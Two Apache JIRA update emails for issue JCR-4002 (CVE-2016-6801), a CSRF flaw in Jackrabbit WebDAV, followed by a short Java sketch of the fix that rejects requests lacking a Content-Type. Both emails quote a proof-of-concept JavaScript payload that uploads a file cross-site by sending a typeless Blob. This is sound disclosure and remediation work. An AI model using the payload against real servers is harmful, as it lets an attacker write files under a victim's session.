[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)

2016-11-10 Thread Julian Reschke (JIRA)

[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Julian Reschke updated JCR-4002:

Fix Version/s: 2.14

> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
> Affects Versions: 2.13.1
> Reporter: Dominique Jäggi
> Assignee: Dominique Jäggi
> Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2, 2.14
>
> Attachments: CVE-2016-6801.txt, 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request 
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> 
>   
> 
>   function submitRequest()
>   {
>     var xhr = new XMLHttpRequest();
>     xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>     xhr.withCredentials = true;
>     var body = "This file has been uploaded via CSRF.=\r\n";
>     var aBody = new Uint8Array(body.length);
>     for (var i = 0; i < aBody.length; i++)
>       aBody[i] = body.charCodeAt(i);
>     // A Blob created without a type makes the browser send no Content-Type header
>     xhr.send(new Blob([aBody]));
>   }
> 
> 
>/>
> 
>   
> 
> {code}
> I will mitigate this particular issue by including a null content type in the 
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
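
The check described in the issue, sketched as an added example (not Jackrabbit's code and not the attached patch). It assumes the reject list holds the three media types an HTML form can submit; the class and method names are hypothetical.

```java
import java.util.Locale;
import java.util.Set;

public class ContentTypeCsrfCheck {
    // Assumed reject list: media types a cross-origin form or XHR can send without a CORS preflight.
    private static final Set<String> FORM_TYPES = Set.of(
            "application/x-www-form-urlencoded", "multipart/form-data", "text/plain");

    // Strip parameters such as "; charset=UTF-8" and normalise case before comparing.
    private static String mediaType(String header) {
        int semi = header.indexOf(';');
        String type = semi < 0 ? header : header.substring(0, semi);
        return type.trim().toLowerCase(Locale.ROOT);
    }

    // Before: a request with no Content-Type header skips the comparison and is accepted.
    static boolean acceptedBefore(String contentType) {
        return contentType == null || !FORM_TYPES.contains(mediaType(contentType));
    }

    // After: a missing header is rejected like the form types.
    // Rejecting a blank header value as well is an assumption of this example.
    static boolean acceptedAfter(String contentType) {
        if (contentType == null || contentType.trim().isEmpty()) {
            return false;
        }
        return !FORM_TYPES.contains(mediaType(contentType));
    }

    public static void main(String[] args) {
        // Constructed sample values; null models a request that carries no Content-Type header.
        String[] samples = { "text/plain; charset=UTF-8", "application/xml", null };
        for (String ct : samples) {
            System.out.printf("%-28s before=%-5b after=%b%n",
                    ct, acceptedBefore(ct), acceptedAfter(ct));
        }
    }
}
```

Only the `null` row differs between the two methods: it is accepted before the change and rejected after it.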


[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)

2016-09-14 Thread Julian Reschke (JIRA)

[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Julian Reschke updated JCR-4002:

Summary: CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) 
 (was: CSRF in Jackrabbit-Webdav using empty content-type)

> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
> Affects Versions: 2.13.1
> Reporter: Dominique Jäggi
> Assignee: Dominique Jäggi
> Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: CVE-2016-6801.txt, 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request 
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> 
>   
> 
>   function submitRequest()
>   {
>     var xhr = new XMLHttpRequest();
>     xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>     xhr.withCredentials = true;
>     var body = "This file has been uploaded via CSRF.=\r\n";
>     var aBody = new Uint8Array(body.length);
>     for (var i = 0; i < aBody.length; i++)
>       aBody[i] = body.charCodeAt(i);
>     // A Blob created without a type makes the browser send no Content-Type header
>     xhr.send(new Blob([aBody]));
>   }
> 
> 
>/>
> 
>   
> 
> {code}
> I will mitigate this particular issue by including a null content type in the 
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319


